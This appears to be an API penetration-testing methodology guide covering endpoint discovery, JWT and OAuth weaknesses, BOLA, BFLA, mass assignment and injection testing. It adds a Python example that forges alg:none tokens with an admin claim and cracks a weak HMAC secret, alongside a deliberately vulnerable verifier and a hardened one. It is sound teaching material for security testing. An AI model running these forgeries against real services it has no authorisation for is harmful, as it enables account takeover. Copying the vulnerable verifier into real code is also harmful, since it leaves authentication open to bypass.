Professional API security testing follows a structured methodology. Improvising without a checklist leads to missed vulnerabilities and incomplete reports.
Discover all API endpoints. Look for Swagger/OpenAPI docs at /swagger.json, /api-docs, /openapi.yaml. Use Burp's crawler, JS file analysis, and Google dorking.
Test JWT weaknesses (alg:none accepted by the verifier, weak or guessable HMAC secrets, signature not checked at all), API keys leaked in JS bundles, URLs, or repositories, OAuth misconfigurations (loose redirect_uri validation, missing state), and password reset flows (token predictability, host header poisoning of reset links).
For every endpoint, test BOLA (request another user's object ID with your own token), BFLA (call admin-only or privileged functions with a low-privilege token), and mass assignment (add fields such as role:admin or admin:true to request bodies and check whether the server persists them).
Test all input fields for SQL injection, NoSQL injection, command injection, XSS in stored fields, and XXE in XML-accepting endpoints.
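The JWT checks from the authentication step above, as an added Python example that is not code from the original page: it builds a token signed with a constructed weak secret, brute-forces that secret from a small constructed wordlist, forges an alg:none token with an elevated claim, and contrasts a verifier that trusts the header's alg field (the bug alg:none exploits) with one that pins the algorithm server-side. The secret, claims and wordlist are assumptions chosen for illustration; only the standard library is used.

```python
import base64
import hashlib
import hmac
import json

# Constructed weak secret for the lab target (assumption, not a real key).
WEAK_SECRET = "secret"


def b64url_encode(data: bytes) -> str:
    """JWT uses unpadded base64url."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign_hs256(signing_input: bytes, secret: str) -> str:
    return b64url_encode(hmac.new(secret.encode(), signing_input, hashlib.sha256).digest())


def make_jwt(payload: dict, secret: str) -> str:
    """Issue an HS256 token the way a typical backend would."""
    header = b64url_encode(b'{"alg":"HS256","typ":"JWT"}')
    body = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    signing_input = f"{header}.{body}".encode()
    return f"{header}.{body}.{sign_hs256(signing_input, secret)}"


def forge_alg_none(token: str, changes: dict) -> str:
    """Attack 1: rewrite the header to alg:none, edit claims, drop the signature."""
    _, body, _ = token.split(".")
    payload = json.loads(b64url_decode(body))
    payload.update(changes)
    header = b64url_encode(b'{"alg":"none","typ":"JWT"}')
    body = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    return f"{header}.{body}."


def crack_hs256_secret(token: str, wordlist):
    """Attack 2: offline brute force of the HMAC secret; returns the secret or None."""
    header, body, sig = token.split(".")
    signing_input = f"{header}.{body}".encode()
    for candidate in wordlist:
        if hmac.compare_digest(sign_hs256(signing_input, candidate), sig):
            return candidate
    return None


def vulnerable_verify(token: str, secret: str):
    """Honours whatever alg the (attacker-controlled) header says."""
    header_b64, body, sig = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") == "none":
        return json.loads(b64url_decode(body))       # no signature check at all
    signing_input = f"{header_b64}.{body}".encode()
    if header.get("alg") == "HS256" and hmac.compare_digest(sign_hs256(signing_input, secret), sig):
        return json.loads(b64url_decode(body))
    return None


def hardened_verify(token: str, secret: str):
    """Pins the expected algorithm and rejects everything else before touching claims."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, body, sig = parts
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        return None                                  # alg:none (and RS/HS confusion) rejected
    signing_input = f"{header_b64}.{body}".encode()
    if not hmac.compare_digest(sign_hs256(signing_input, secret), sig):
        return None
    return json.loads(b64url_decode(body))


if __name__ == "__main__":
    token = make_jwt({"sub": 42, "role": "user"}, WEAK_SECRET)
    # Constructed mini wordlist; in a real test use a JWT secret list.
    print("cracked secret:", crack_hs256_secret(token, ["password", "changeme", "secret"]))
    forged = forge_alg_none(token, {"role": "admin"})
    print("vulnerable verifier accepts forged token:", vulnerable_verify(forged, WEAK_SECRET))
    print("hardened verifier accepts forged token:", hardened_verify(forged, WEAK_SECRET))
```

Record both the forged token and the server's response to it as evidence; a 200 with elevated data proves the finding, whereas a cracked secret alone only shows the key is weak until you resign a modified token and the API accepts it.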
✅ Always document every endpoint found, every test performed, and every finding with full request/response evidence. Reproducibility is what separates a professional pentest report from amateur notes.